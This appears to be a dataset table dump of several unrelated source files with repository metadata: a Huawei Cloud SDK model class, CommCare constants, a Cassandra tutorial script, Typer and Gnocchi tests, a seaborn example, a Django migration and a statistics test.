def __init__(self, app_id=None, available_replica=None, build=None, build_id=None, build_log_id=None, env_id=None, id=None, image_url=None, job_id=None, log_group_id=None, log_stream_id=None, name=None, operation=None, operation_status=None, replica=None, resource_limit=None, runtime=None, source=None, status=None, version=None, created_at=None, updated_at=None):
"""ComponentSnapshotContext
The model defined in huaweicloud sdk
:param app_id: 应用ID。
:type app_id: str
:param available_replica: 可用实例个数。
:type available_replica: int
:param build: 组件构建信息。
:type build: str
:param build_id: 构建任务ID。
:type build_id: str
:param build_log_id: 构建日志ID。
:type build_log_id: str
:param env_id: 环境ID。
:type env_id: str
:param id: 组件ID。
:type id: str
:param image_url: 镜像地址。
:type image_url: str
:param job_id: 任务ID。
:type job_id: str
:param log_group_id: LTS日志组的ID。
:type log_group_id: str
:param log_stream_id: LTS日志流的ID
:type log_stream_id: str
:param name: 组件名称。
:type name: str
:param operation: 组件操作。
:type operation: str
:param operation_status: 组件操作状态。
:type operation_status: str
:param replica: 实例个数。
:type replica: int
:param resource_limit: 组件规格。
:type resource_limit: str
:param runtime: 语言/运行时。
:type runtime: str
:param source: 组件源信息。
:type source: str
:param status: 组件状态。
:type status: str
:param version: 组件版本。
:type version: str
:param created_at: 创建时间。
:type created_at: str
:param updated_at: 更新时间。
:type updated_at: str
"""
self._app_id = None
self._available_replica = None
self._build = None
self._build_id = None
self._build_log_id = None
self._env_id = None
self._id = None
self._image_url = None
self._job_id = None
self._log_group_id = None
self._log_stream_id = None
self._name = None
self._operation = None
self._operation_status = None
self._replica = None
self._resource_limit = None
self._runtime = None
self._source = None
self._status = None
self._version = None
self._created_at = None
self._updated_at = None
self.discriminator = None
if app_id is not None:
self.app_id = app_id
if available_replica is not None:
self.available_replica = available_replica
if build is not None:
self.build = build
if build_id is not None:
self.build_id = build_id
if build_log_id is not None:
self.build_log_id = build_log_id
if env_id is not None:
self.env_id = env_id
if id is not None:
self.id = id
if image_url is not None:
self.image_url = image_url
if job_id is not None:
self.job_id = job_id
if log_group_id is not None:
self.log_group_id = log_group_id
if log_stream_id is not None:
self.log_stream_id = log_stream_id
if name is not None:
self.name = name
if operation is not None:
self.operation = operation
if operation_status is not None:
self.operation_status = operation_status
if replica is not None:
self.replica = replica
if resource_limit is not None:
self.resource_limit = resource_limit
if runtime is not None:
self.runtime = runtime
if source is not None:
self.source = source
if status is not None:
self.status = status
if version is not None:
self.version = version
if created_at is not None:
self.created_at = created_at
if updated_at is not None:
self.updated_at = updated_at
@property
def app_id(self):
"""Gets the app_id of this ComponentSnapshotContext.
应用ID。
:return: The app_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._app_id
@app_id.setter
def app_id(self, app_id):
"""Sets the app_id of this ComponentSnapshotContext.
应用ID。
:param app_id: The app_id of this ComponentSnapshotContext.
:type app_id: str
"""
self._app_id = app_id
@property
def available_replica(self):
"""Gets the available_replica of this ComponentSnapshotContext.
可用实例个数。
:return: The available_replica of this ComponentSnapshotContext.
:rtype: int
"""
return self._available_replica
@available_replica.setter
def available_replica(self, available_replica):
"""Sets the available_replica of this ComponentSnapshotContext.
可用实例个数。
:param available_replica: The available_replica of this ComponentSnapshotContext.
:type available_replica: int
"""
self._available_replica = available_replica
@property
def build(self):
"""Gets the build of this ComponentSnapshotContext.
组件构建信息。
:return: The build of this ComponentSnapshotContext.
:rtype: str
"""
return self._build
@build.setter
def build(self, build):
"""Sets the build of this ComponentSnapshotContext.
组件构建信息。
:param build: The build of this ComponentSnapshotContext.
:type build: str
"""
self._build = build
@property
def build_id(self):
"""Gets the build_id of this ComponentSnapshotContext.
构建任务ID。
:return: The build_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._build_id
@build_id.setter
def build_id(self, build_id):
"""Sets the build_id of this ComponentSnapshotContext.
构建任务ID。
:param build_id: The build_id of this ComponentSnapshotContext.
:type build_id: str
"""
self._build_id = build_id
@property
def build_log_id(self):
"""Gets the build_log_id of this ComponentSnapshotContext.
构建日志ID。
:return: The build_log_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._build_log_id
@build_log_id.setter
def build_log_id(self, build_log_id):
"""Sets the build_log_id of this ComponentSnapshotContext.
构建日志ID。
:param build_log_id: The build_log_id of this ComponentSnapshotContext.
:type build_log_id: str
"""
self._build_log_id = build_log_id
@property
def env_id(self):
"""Gets the env_id of this ComponentSnapshotContext.
环境ID。
:return: The env_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._env_id
@env_id.setter
def env_id(self, env_id):
"""Sets the env_id of this ComponentSnapshotContext.
环境ID。
:param env_id: The env_id of this ComponentSnapshotContext.
:type env_id: str
"""
self._env_id = env_id
@property
def id(self):
"""Gets the id of this ComponentSnapshotContext.
组件ID。
:return: The id of this ComponentSnapshotContext.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ComponentSnapshotContext.
组件ID。
:param id: The id of this ComponentSnapshotContext.
:type id: str
"""
self._id = id
@property
def image_url(self):
"""Gets the image_url of this ComponentSnapshotContext.
镜像地址。
:return: The image_url of this ComponentSnapshotContext.
:rtype: str
"""
return self._image_url
@image_url.setter
def image_url(self, image_url):
"""Sets the image_url of this ComponentSnapshotContext.
镜像地址。
:param image_url: The image_url of this ComponentSnapshotContext.
:type image_url: str
"""
self._image_url = image_url
@property
def job_id(self):
"""Gets the job_id of this ComponentSnapshotContext.
任务ID。
:return: The job_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this ComponentSnapshotContext.
任务ID。
:param job_id: The job_id of this ComponentSnapshotContext.
:type job_id: str
"""
self._job_id = job_id
@property
def log_group_id(self):
"""Gets the log_group_id of this ComponentSnapshotContext.
LTS日志组的ID。
:return: The log_group_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""Sets the log_group_id of this ComponentSnapshotContext.
LTS日志组的ID。
:param log_group_id: The log_group_id of this ComponentSnapshotContext.
:type log_group_id: str
"""
self._log_group_id = log_group_id
@property
def log_stream_id(self):
"""Gets the log_stream_id of this ComponentSnapshotContext.
LTS日志流的ID
:return: The log_stream_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._log_stream_id
@log_stream_id.setter
def log_stream_id(self, log_stream_id):
"""Sets the log_stream_id of this ComponentSnapshotContext.
LTS日志流的ID
:param log_stream_id: The log_stream_id of this ComponentSnapshotContext.
:type log_stream_id: str
"""
self._log_stream_id = log_stream_id
@property
def name(self):
"""Gets the name of this ComponentSnapshotContext.
组件名称。
:return: The name of this ComponentSnapshotContext.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ComponentSnapshotContext.
组件名称。
:param name: The name of this ComponentSnapshotContext.
:type name: str
"""
self._name = name
@property
def operation(self):
"""Gets the operation of this ComponentSnapshotContext.
组件操作。
:return: The operation of this ComponentSnapshotContext.
:rtype: str
"""
return self._operation
@operation.setter
def operation(self, operation):
"""Sets the operation of this ComponentSnapshotContext.
组件操作。
:param operation: The operation of this ComponentSnapshotContext.
:type operation: str
"""
self._operation = operation
@property
def operation_status(self):
"""Gets the operation_status of this ComponentSnapshotContext.
组件操作状态。
:return: The operation_status of this ComponentSnapshotContext.
:rtype: str
"""
return self._operation_status
@operation_status.setter
def operation_status(self, operation_status):
"""Sets the operation_status of this ComponentSnapshotContext.
组件操作状态。
:param operation_status: The operation_status of this ComponentSnapshotContext.
:type operation_status: str
"""
self._operation_status = operation_status
@property
def replica(self):
"""Gets the replica of this ComponentSnapshotContext.
实例个数。
:return: The replica of this ComponentSnapshotContext.
:rtype: int
"""
return self._replica
@replica.setter
def replica(self, replica):
"""Sets the replica of this ComponentSnapshotContext.
实例个数。
:param replica: The replica of this ComponentSnapshotContext.
:type replica: int
"""
self._replica = replica
@property
def resource_limit(self):
"""Gets the resource_limit of this ComponentSnapshotContext.
组件规格。
:return: The resource_limit of this ComponentSnapshotContext.
:rtype: str
"""
return self._resource_limit
@resource_limit.setter
def resource_limit(self, resource_limit):
"""Sets the resource_limit of this ComponentSnapshotContext.
组件规格。
:param resource_limit: The resource_limit of this ComponentSnapshotContext.
:type resource_limit: str
"""
self._resource_limit = resource_limit
@property
def runtime(self):
"""Gets the runtime of this ComponentSnapshotContext.
语言/运行时。
:return: The runtime of this ComponentSnapshotContext.
:rtype: str
"""
return self._runtime
@runtime.setter
def runtime(self, runtime):
"""Sets the runtime of this ComponentSnapshotContext.
语言/运行时。
:param runtime: The runtime of this ComponentSnapshotContext.
:type runtime: str
"""
self._runtime = runtime
@property
def source(self):
"""Gets the source of this ComponentSnapshotContext.
组件源信息。
:return: The source of this ComponentSnapshotContext.
:rtype: str
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this ComponentSnapshotContext.
组件源信息。
:param source: The source of this ComponentSnapshotContext.
:type source: str
"""
self._source = source
@property
def status(self):
"""Gets the status of this ComponentSnapshotContext.
组件状态。
:return: The status of this ComponentSnapshotContext.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ComponentSnapshotContext.
组件状态。
:param status: The status of this ComponentSnapshotContext.
:type status: str
"""
self._status = status
@property
def version(self):
"""Gets the version of this ComponentSnapshotContext.
组件版本。
:return: The version of this ComponentSnapshotContext.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ComponentSnapshotContext.
组件版本。
:param version: The version of this ComponentSnapshotContext.
:type version: str
"""
self._version = version
@property
def created_at(self):
"""Gets the created_at of this ComponentSnapshotContext.
创建时间。
:return: The created_at of this ComponentSnapshotContext.
:rtype: str
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this ComponentSnapshotContext.
创建时间。
:param created_at: The created_at of this ComponentSnapshotContext.
:type created_at: str
"""
self._created_at = created_at
@property
def updated_at(self):
"""Gets the updated_at of this ComponentSnapshotContext.
更新时间。
:return: The updated_at of this ComponentSnapshotContext.
:rtype: str
"""
return self._updated_at
@updated_at.setter
def updated_at(self, updated_at):
"""Sets the updated_at of this ComponentSnapshotContext.
更新时间。
:param updated_at: The updated_at of this ComponentSnapshotContext.
:type updated_at: str
"""
self._updated_at = updated_at
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ComponentSnapshotContext):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
4408f2da3cc0458926f976eb6d208f94a4dbb331 | 05a2097cbc167c0d8cfde5a039600c6994a34232 | /custom/penn_state/constants.py | 74aac3cb2025c0fd4a0abd1312f7931d10a6287f | []
| no_license | shashanks/commcare-hq | 9c641a4d830cd523410be150c2d341c4edbce38a | 44c2bd56bcb746f1f6c7b624ddefbe4215fc791c | refs/heads/master | 2020-12-11T06:12:36.705418 | 2013-12-17T08:35:23 | 2013-12-17T08:35:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | DOMAIN = 'psu-legacy-together'
DAILY_DATA_XMLNS = 'http://openrosa.org/formdesigner/B6E92793-CB42-449C-ACE7-99B0E65FE3AE'
COACH_RESPONSE_XMLNS = 'http://openrosa.org/formdesigner/D42C8CAB-F17C-4E9C-921C-CA47E6AECE15'
WEEKLY_SCHEDULE_XMLNS = 'http://openrosa.org/formdesigner/F2F7A739-BDEF-4D14-B60F-371AFE901B71'
| [
"[email protected]"
]
| |
952498fe3ce65449fb818515ea9a956611e27c3a | 37f48a90a33015a6e51d8b4ad839f5741a0c320f | /NoSQL_Cassandra/4_where_clause.py | 68a612d995a381451d49b6fabe6b8caf595c9534 | []
| no_license | Hadryan/Data_Engineering | 90376170a9a6a9700d1a1f32ea4b6efe6cdcbd98 | f02db4f2ffb592277b44c2807884443c910725b1 | refs/heads/master | 2020-12-14T11:01:33.399933 | 2019-12-21T15:36:33 | 2019-12-21T15:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,248 | py | # Since NoSQL has no JOINs, where becomes imperative
import cassandra
from cassandra.cluster import Cluster
print('create connection to database \n')
try:
cluster = Cluster(['127.0.0.1'])
session = cluster.connect()
except Exception as e:
print(e)
print('create keyspace/database \n')
try:
session.execute("""
CREATE KEYSPACE IF NOT EXISTS udacity
WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor': 1}""")
except Exception as e:
print(e)
# connect to key space
print('connect to key space \n')
try:
session.set_keyspace('udacity')
except Exception as e:
print(e)
# create table with query impression : 4 queries
# query 1 = all albums in a given year
# query 2 = album realeased by 'The Beatles'
# query 3 = select city from year=1970 & artist_name=The Beatles
print('create table \n')
query = "CREATE TABLE IF NOT EXISTS songs_library "
query = query + \
'(year int, artist_name text, album_name text, city text, PRIMARY KEY (year, artist_name, album_name))'
try:
session.execute(query)
except Exception as e:
print(e)
# Insert 5 rows
print('insert rows \n')
query = "INSERT INTO songs_library (year, artist_name, album_name, city)"
query = query + "values(%s, %s, %s, %s)"
try:
session.execute(query, (1970, "The Beatles", "Let It Be", 'Liverpool'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Beatles", "Rubber Soul", 'Oxford'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Who", "My Generation", 'London'))
except Exception as e:
print(e)
try:
session.execute(query, (1966, "The Monkees", "The Monkees", 'Los Angeles'))
except Exception as e:
print(e)
try:
session.execute(query, (1970, "The Carpenters",
"Close To You", 'San Diego'))
except Exception as e:
print(e)
# validate that data was inserted
print('query 1 = all albums in a given year=1970 \n')
query = "SELECT * FROM songs_library WHERE year=1970"
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 2 = album realeased by 'The Beatles' where year=1970 \n")
query = "SELECT * FROM songs_library WHERE year=1970 AND artist_name='The Beatles' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 3 = album released year=1970 AND artist_name='The Beatles' AND album_name='Let IT BE' \n ")
query = "SELECT city FROM songs_library WHERE year = 1970 AND artist_name = 'The Beatles' AND album_name = 'Let It Be' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.city)
# drop table
print("\n drop table \n")
query = "DROP TABLE songs_library"
try:
rows = session.execute(query)
except Exception as e:
print(e)
# close session & cluster connection
print('close session & connection \n')
session.shutdown()
cluster.shutdown()
| [
"[email protected]"
]
| |
4088843b646eab6f6b40d2158cddb8ac622154dd | f0acc407f95b758fa734f5ed5f6506a8b20d2706 | /tests/test_tutorial/test_options/test_name/test_tutorial004_an.py | 087b436d55d07adedb8c0365657f3f42ab29d946 | [
"MIT"
]
| permissive | shnups/typer | ede6d86c5b169e8caa7823b0552f8531ed041f84 | e0b207f3f577cb2e59fdd60da39686a2f5ed0e77 | refs/heads/master | 2023-08-31T01:54:21.168547 | 2023-08-01T09:36:09 | 2023-08-01T09:36:09 | 313,047,732 | 0 | 0 | MIT | 2020-11-15T14:22:06 | 2020-11-15T14:22:05 | null | UTF-8 | Python | false | false | 1,018 | py | import subprocess
import sys
import typer
from typer.testing import CliRunner
from docs_src.options.name import tutorial004_an as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_option_help():
result = runner.invoke(app, ["--help"])
assert result.exit_code == 0
assert "-n" in result.output
assert "--user-name" in result.output
assert "TEXT" in result.output
assert "--name" not in result.output
def test_call():
result = runner.invoke(app, ["-n", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_call_long():
result = runner.invoke(app, ["--user-name", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_script():
result = subprocess.run(
[sys.executable, "-m", "coverage", "run", mod.__file__, "--help"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "Usage" in result.stdout
| [
"[email protected]"
]
| |
177511eb917f0c04de3ac00852473301adffedd1 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Scraper/scrapy/tests/test_command_version.py | f8c4ac141c2766133ad886ccb9a77791d7dbb1dc | [
"BSD-3-Clause"
]
| permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:73dce6f404541d9151c420cb22ff641258ce3d66e825df13aa289ff4a5c1f1ad
size 1058
| [
"[email protected]"
]
| |
eb6a8f7da9c4bcaff2db10a52426f6a119af66c9 | a1c9c55e1520356113a320be18e8fcb31654a944 | /archive/0.9/generated/seaborn-violinplot-1.py | 87adeb3dba3ac608c3ceeb5db1a699327d0c16bb | []
| no_license | seaborn/seaborn.github.io | bac12a9255b41c7971e9e94ea393d372ef66ef62 | f70445bc3456f0216169806c2daf03452ca1eba4 | refs/heads/master | 2023-01-06T10:50:10.789810 | 2022-12-30T19:59:55 | 2022-12-30T19:59:55 | 70,731,605 | 16 | 5 | null | 2022-06-28T00:32:07 | 2016-10-12T18:56:12 | HTML | UTF-8 | Python | false | false | 123 | py | import seaborn as sns
sns.set(style="whitegrid")
tips = sns.load_dataset("tips")
ax = sns.violinplot(x=tips["total_bill"])
| [
"[email protected]"
]
| |
2e74d353ab354e12d997f17a482999f383cf75ab | 68c421b58f43c82ba1f7c5b95138f76094a44f8e | /telemetry_tempest_plugin/scenario/test_gnocchi.py | e283d2f288d9f71f0080f2164111e4f39526039b | [
"Apache-2.0"
]
| permissive | NeCTAR-RC/telemetry-tempest-plugin | 37c986541ccad951e2cd7db3394a76a58ea1ce14 | fc990c4ada71ca3c45df2d4733bb1fb4b7f7c9e5 | refs/heads/master | 2021-06-27T03:24:35.519246 | 2019-05-24T06:21:57 | 2019-05-24T06:47:41 | 194,606,282 | 0 | 0 | null | 2019-07-01T05:36:00 | 2019-07-01T05:36:00 | null | UTF-8 | Python | false | false | 1,659 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import os
from tempest import config
import tempest.test
from telemetry_tempest_plugin.scenario import utils
CONF = config.CONF
TEST_DIR = os.path.join(os.path.dirname(__file__), 'gnocchi_gabbits')
class GnocchiGabbiTest(tempest.test.BaseTestCase):
credentials = ['admin']
TIMEOUT_SCALING_FACTOR = 5
@classmethod
def skip_checks(cls):
super(GnocchiGabbiTest, cls).skip_checks()
if not CONF.service_available.gnocchi:
raise cls.skipException("Gnocchi support is required")
def _prep_test(self, filename):
token = self.os_admin.auth_provider.get_token()
url = self.os_admin.auth_provider.base_url(
{'service': CONF.metric.catalog_type,
'endpoint_type': CONF.metric.endpoint_type,
'region': CONF.identity.region})
os.environ.update({
"GNOCCHI_SERVICE_URL": url,
"GNOCCHI_SERVICE_TOKEN": token,
"GNOCCHI_AUTHORIZATION": "not used",
})
utils.generate_tests(GnocchiGabbiTest, TEST_DIR)
| [
"[email protected]"
]
| |
d35548b0e453cd2577815b23e395954965d3dc5b | 6584124fee86f79ce0c9402194d961395583d6c3 | /blog/migrations/0008_auto_20150603_0708.py | 3f31a14ba2dcb128cea981661d996c147b8152a8 | []
| no_license | janusnic/webman | fdcffb7ed2f36d0951fd18bbaa55d0626cd271e1 | 2e5eaadec64314fddc19f27d9313317f7a236b9e | refs/heads/master | 2018-12-28T18:21:00.291717 | 2015-06-05T11:49:00 | 2015-06-05T11:49:00 | 35,676,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import blog.models
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_page'),
]
operations = [
migrations.CreateModel(
name='Slide',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Dratf'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
('image', models.ImageField(max_length=1024, null=True, upload_to=blog.models.get_blog_file_name, blank=True)),
],
),
migrations.CreateModel(
name='Slider',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Dratf'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.AddField(
model_name='slide',
name='related_slider',
field=models.ForeignKey(to='blog.Slider'),
),
]
| [
"[email protected]"
]
| |
6e62b6a94f556f56721f4c83e23b79e90a9d3e9e | 9d01e03d2e1ff388aad8331280892192e02c0f9d | /limix_genetics/test/test_mvnorm.py | 3fe54045b300c7d796064df3b8d5a0c6ef22f528 | [
"MIT"
]
| permissive | limix/limix-genetics | a1dd7e18f55ce62265ca3deaeac0b83ff71239d8 | 9c69a59a61e030243a9f865a7f7ae8842859eaee | refs/heads/master | 2021-01-20T11:00:16.974644 | 2017-02-14T13:26:48 | 2017-02-14T13:26:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | from limix_genetics import mvn_ecdf, mvn_eicdf
from numpy.testing import assert_allclose
def test_mvnorm():
x = [1, 2]
mean = [1.0, -0.3]
cov = [[1.5, 0.2],
[0.2, 0.7]]
cdf = mvn_ecdf(x, mean, cov)
icdf = mvn_eicdf(cdf, mean, cov)
assert_allclose(cdf, 0.98032128770733662)
assert_allclose(cdf, mvn_ecdf(icdf, mean, cov))
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.